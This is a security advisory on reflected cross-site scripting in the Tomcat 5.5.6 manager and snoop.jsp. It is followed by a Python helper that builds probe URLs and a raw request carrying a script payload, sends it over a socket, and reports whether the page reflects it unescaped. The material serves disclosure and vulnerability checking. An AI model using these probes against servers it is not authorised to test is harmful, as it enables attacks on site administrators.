Apache Jakarta Tomcat Cross Site Scripting Vulnerabilities
==========================================================

Version
=======
Apache Tomcat/5.5.6 running on Windows 2000
(Other platforms may also be affected)

Exploiting
==========
http://192.168.0.23:8080/manager/html/
http://192.168.0.23:8080/manager/html/stop?path=
http://192.168.0.23:8080/manager/html/start?path=

The second one works without authentication, but should not be that easy to exploit:

Telnet to port 8080 and paste the following:

/jsp-examples/snp/snoop.jsp HTTP/1.0

Vendor
======
http://jakarta.apache.org

Patch
=====
http://www.mail-archive.com/tomcat-dev@jakarta.apache.org/msg66978.html

Discovered
==========
03.Jan.2005
oliver karow
http://www.oliverkarow.de/research/jakarta556_xss.txt
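To make the reflection check behind the Exploiting section concrete, here is an added Python example; it is not part of the original advisory and not Tomcat's own code. It builds the manager stop/start probe URL with a payload in the `path` parameter, builds the raw HTTP/1.0 request for the snoop.jsp "telnet to port 8080" step, and classifies a response body as reflecting the probe raw (vulnerable), HTML-escaped (neutralised, as a patch would do), or not at all. The probe string, the choice of the `path` parameter and of an `X-Probe` request header as the reflection points, the `send_raw` helper and the two sample response bodies are assumptions constructed for this example; the advisory does not show the payload it used.

```python
"""Offline helpers for checking the reflected-XSS behaviour this advisory describes."""
import html
import socket
from urllib.parse import quote

# Probe payload used for all checks below (chosen for this example; the advisory
# does not show its own payload).
MARKER = "<script>alert(1)</script>"


def build_manager_url(host, port, action, marker=MARKER):
    """URL for the manager's stop/start handler with the probe in the `path` parameter.

    Placing the payload in `path` is an assumption about where the reflection happens.
    """
    if action not in ("stop", "start"):
        raise ValueError("action must be 'stop' or 'start'")
    return f"http://{host}:{port}/manager/html/{action}?path={quote(marker, safe='')}"


def build_snoop_request(marker=MARKER, header="X-Probe"):
    """Raw HTTP/1.0 request for snoop.jsp, i.e. the manual 'telnet to port 8080' step.

    snoop.jsp echoes request details back into its page; this example assumes a
    request header is among the echoed fields and plants the probe there.
    """
    return (
        "GET /jsp-examples/snp/snoop.jsp HTTP/1.0\r\n"
        f"{header}: {marker}\r\n"
        "\r\n"
    )


def classify_reflection(body, marker=MARKER):
    """Decide how the server reflected the probe.

    'raw'     -> marker appears verbatim: the script would execute (vulnerable)
    'escaped' -> only the HTML-escaped form appears: the page neutralised it
    'absent'  -> the probe was not reflected at all
    """
    if marker in body:
        return "raw"
    if html.escape(marker, quote=False) in body:
        return "escaped"
    return "absent"


def send_raw(host, port, request, timeout=5.0):
    """Send a raw request the way the advisory's telnet step does; return the response text.

    Assumed helper for live use; the checks below run on constructed bodies instead.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request.encode("latin-1"))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1", errors="replace")


# Constructed sample responses (not real Tomcat output): what a vulnerable and a
# fixed snoop.jsp would plausibly emit for the header planted by build_snoop_request().
VULNERABLE_BODY = (
    "<html><body><h1>Request Information</h1>\n"
    "<b>X-Probe:</b> <script>alert(1)</script>\n"
    "</body></html>"
)
FIXED_BODY = (
    "<html><body><h1>Request Information</h1>\n"
    "<b>X-Probe:</b> &lt;script&gt;alert(1)&lt;/script&gt;\n"
    "</body></html>"
)


if __name__ == "__main__":
    print(build_manager_url("192.168.0.23", 8080, "stop"))
    print(build_snoop_request(), end="")
    for label, body in (("vulnerable", VULNERABLE_BODY), ("fixed", FIXED_BODY)):
        print(f"{label}: {classify_reflection(body)}")
```

The manager application is normally protected by a login with the manager role, so the stop/start URLs only reflect the payload to a user who is already authenticated to the manager; that limits those two to a link-following attack on an administrator. The raw-request path to snoop.jsp needs no credentials, which is why `classify_reflection` is written to work on whatever `send_raw` returns rather than on a browser-rendered page.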